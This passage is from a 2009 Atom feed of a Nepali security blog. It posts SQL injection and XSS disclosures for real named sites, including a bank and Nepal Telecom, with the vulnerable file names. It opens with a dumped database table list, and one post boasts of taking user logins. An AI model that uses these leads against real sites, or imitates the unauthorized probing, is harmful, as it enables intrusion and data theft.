/&gt;cs_section&lt;br /&gt;cs_wallpaper&lt;br /&gt;discography&lt;br /&gt;doc_ques_ans&lt;br /&gt;doc_sub&lt;br /&gt;logers&lt;br /&gt;logonuser&lt;br /&gt;org_para&lt;br /&gt;phpwebgallery_caddie&lt;br /&gt;phpwebgallery_categories&lt;br /&gt;phpwebgallery_comments&lt;br /&gt;phpwebgallery_config&lt;br /&gt;phpwebgallery_favorites&lt;br /&gt;phpwebgallery_group_access&lt;br /&gt;phpwebgallery_groups&lt;br /&gt;phpwebgallery_history&lt;br /&gt;phpwebgallery_image_category&lt;br /&gt;phpwebgallery_image_tag&lt;br /&gt;phpwebgallery_images&lt;br /&gt;phpwebgallery_rate&lt;br /&gt;phpwebgallery_search&lt;br /&gt;phpwebgallery_sessions&lt;br /&gt;phpwebgallery_sites&lt;br /&gt;phpwebgallery_tags&lt;br /&gt;phpwebgallery_upgrade&lt;br /&gt;phpwebgallery_user_access&lt;br /&gt;phpwebgallery_user_cache&lt;br /&gt;phpwebgallery_user_feed&lt;br /&gt;phpwebgallery_user_group&lt;br /&gt;phpwebgallery_user_infos&lt;br /&gt;phpwebgallery_user_mail_notification&lt;br /&gt;phpwebgallery_users&lt;br /&gt;phpwebgallery_waiting&lt;br /&gt;regis&lt;br /&gt;tbl_movie_artist_profile&lt;br /&gt;tbl_movie_person&lt;br /&gt;tbl_movie_persontype&lt;br /&gt;tbl_movie_profilesetup&lt;br /&gt;test1&lt;br /&gt;test2&lt;br /&gt;vdb_artist_info&lt;br /&gt;vdb_discography&lt;br /&gt;vdb_music_category&lt;br /&gt;vdb_video_info&lt;br /&gt;&lt;br /&gt;So that's the end of the show... Feeling sleepy (its 12:23 AM already). Bye guys.&lt;br /&gt;Thanks and Happy Hacking!!! :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2484764720818201263?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2484764720818201263/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/cybersansar-database-disclosure.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2484764720818201263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2484764720818201263'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/cybersansar-database-disclosure.html' title='CyberSansar Database Disclosure'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-7248223457880422903</id><published>2009-10-27T04:12:00.000-07:00</published><updated>2009-10-27T04:56:35.922-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='ioe.edu.np'/><title type='text'>IOE, Pulchowk website SQLi vulnerability</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/Subfa-GGm7I/AAAAAAAAAAc/GuTf1uegoNU/s1600-h/Screenshot-2.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 195px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/Subfa-GGm7I/AAAAAAAAAAc/GuTf1uegoNU/s320/Screenshot-2.png" alt="" id="BLOGGER_PHOTO_ID_5397246857888308146" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;IOE.edu.np SQLi vulnerability&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Site&lt;/span&gt;: www.ioe.edu.np&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Risk&lt;/span&gt;: Low[I just did it quickly and seems there's no critical data in the site]&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Notified&lt;/span&gt;: NO&lt;br /&gt;/*Action from Admin: N/A*/&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Vulnerable file&lt;/span&gt;: You should figure it out easily&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit&lt;/span&gt;: The php script do not validate the inputs from user which can be used to compromise the database.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution&lt;/span&gt;: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;Just added this one to show how our security is? We don't care or we don't know how to...&lt;br /&gt;Thank you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7248223457880422903?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/7248223457880422903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/ioe-pulchowk-website-sqli-vulnerability.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7248223457880422903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7248223457880422903'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/ioe-pulchowk-website-sqli-vulnerability.html' title='IOE, Pulchowk website SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_R7J4rokcecI/Subfa-GGm7I/AAAAAAAAAAc/GuTf1uegoNU/s72-c/Screenshot-2.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4904291929623673202</id><published>2009-10-27T03:48:00.000-07:00</published><updated>2009-10-27T03:51:20.521-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='enasha.com'/><title type='text'>Enasha SQLi vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Enasha.com SQLi vulnerability&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Site&lt;/span&gt;: www.enasha.com&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Risk&lt;/span&gt;: Medium - High&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Notified&lt;/span&gt;: YES&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Action from Admin&lt;/span&gt;: N/A&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Vulnerable file&lt;/span&gt;: Admins, check email&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit&lt;/span&gt;: The different pages do not validate the inputs from user which can be used to compromise the database.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution&lt;/span&gt;: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;Sample screenshot:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_R7J4rokcecI/SubQVWniXcI/AAAAAAAAAAU/9j0P5Y1s_SE/s1600-h/Screenshot-1.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 128px;" src="http://4.bp.blogspot.com/_R7J4rokcecI/SubQVWniXcI/AAAAAAAAAAU/9j0P5Y1s_SE/s320/Screenshot-1.png" alt="" id="BLOGGER_PHOTO_ID_5397230268717358530" border="0" /&gt;&lt;/a&gt;See the title of the site...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4904291929623673202?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4904291929623673202/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/enasha-sqli-vulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4904291929623673202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4904291929623673202'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/enasha-sqli-vulnerability.html' title='Enasha SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_R7J4rokcecI/SubQVWniXcI/AAAAAAAAAAU/9j0P5Y1s_SE/s72-c/Screenshot-1.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-7469308676608594971</id><published>2009-10-27T03:21:00.000-07:00</published><updated>2009-10-27T03:32:50.706-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='cross site scripting'/><category scheme='http://www.blogger.com/atom/ns#' term='laxmibank.com'/><title type='text'>Laxmibank.com XSS/SQLi vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Laxmi Bank XSS/SQLi vulnerability&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Site&lt;/span&gt;: www.laxmibank.com&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Risk&lt;/span&gt;: Medium - High&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Notified&lt;/span&gt;: YES&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Action from Admin&lt;/span&gt;: N/A&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Vulnerable file&lt;/span&gt;: searchpage.asp&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit&lt;/span&gt;: The search doesn't sanitize the input from user. So it suffers from XSS. And moreover specially crafted SQL queries can be done through search box&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution&lt;/span&gt;: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;Note that we have notified Laxmi Bank about this long time ago but they didn't give us any reply or didn't update themselves.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7469308676608594971?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/7469308676608594971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/laxmibankcom-xsssqli-vulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7469308676608594971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/7469308676608594971'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/laxmibankcom-xsssqli-vulnerability.html' title='Laxmibank.com XSS/SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2336380596907260435</id><published>2009-10-27T03:04:00.000-07:00</published><updated>2009-10-27T03:21:15.690-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ntc.net.np'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='cross site scripting'/><category scheme='http://www.blogger.com/atom/ns#' term='nepal telecom'/><title type='text'>Nepal Telecom XSS vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Nepal Telecom XSS vulnerability&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Site&lt;/span&gt;: www.ntc.net.np&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Risk&lt;/span&gt;: Low&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Notified&lt;/span&gt;: YES&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Action from Admin&lt;/span&gt;: N/A&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Vulnerable file&lt;/span&gt;: /search/searchresult.php&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit&lt;/span&gt;: The search doesn't sanitize the input from user. So it suffers from XSS.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution&lt;/span&gt;: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;More message to NTC, you are open to a lot of problems. We got all the PSTN Bank user logins(we also know where to login from) and what's the point of putting phpinfo() online. We grabbed the PHP information from NTC. Also, why would you like to put apache manual on the website (though isn't a potential risk). Contact us if you want to know more vulnerabilities I think I shouldn't discuss over here.&lt;br /&gt;Thank you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2336380596907260435?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2336380596907260435/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/nepal-telecom-xss-vulnerability.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2336380596907260435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2336380596907260435'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/nepal-telecom-xss-vulnerability.html' title='Nepal Telecom XSS vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-3469431542254922690</id><published>2009-10-27T02:43:00.000-07:00</published><updated>2009-10-27T02:55:55.770-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='madhavnepal.com'/><title type='text'>Madhavnepal.com SQLi vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;MadhavNepal.com SQLi vulnerability&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;Site: www.madhavnepal.com&lt;br /&gt;Risk: Low-Medium [you need to find admin panel and MySQL&lt;5]&lt;br /&gt;Notified: YES&lt;br /&gt;Action from siteadmin: N/A&lt;br /&gt;Vulnerable file: large_tasbir.php&lt;br /&gt;Exploit: large_tasbir.php doesnot filter the id variable passed to it.&lt;br /&gt;Example: We know so we don't post...&lt;br /&gt;Solution: sam207 has written an article on it.&lt;br /&gt;&lt;br /&gt;Sample screenshot:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_R7J4rokcecI/SubDFwpAftI/AAAAAAAAAAM/gqCqQtZPMAE/s1600-h/Screenshot.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 202px;" src="http://4.bp.blogspot.com/_R7J4rokcecI/SubDFwpAftI/AAAAAAAAAAM/gqCqQtZPMAE/s320/Screenshot.png" alt="" id="BLOGGER_PHOTO_ID_5397215707173781202" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Note that the site administrator has been notified with this vulnerability. Thank you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-3469431542254922690?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/3469431542254922690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/madhavnepalcom-sqli-vulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/3469431542254922690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/3469431542254922690'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/madhavnepalcom-sqli-vulnerability.html' title='Madhavnepal.com SQLi vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_R7J4rokcecI/SubDFwpAftI/AAAAAAAAAAM/gqCqQtZPMAE/s72-c/Screenshot.png' height='72' width='72'/><thr:total>1</thr:total></entry></feed>
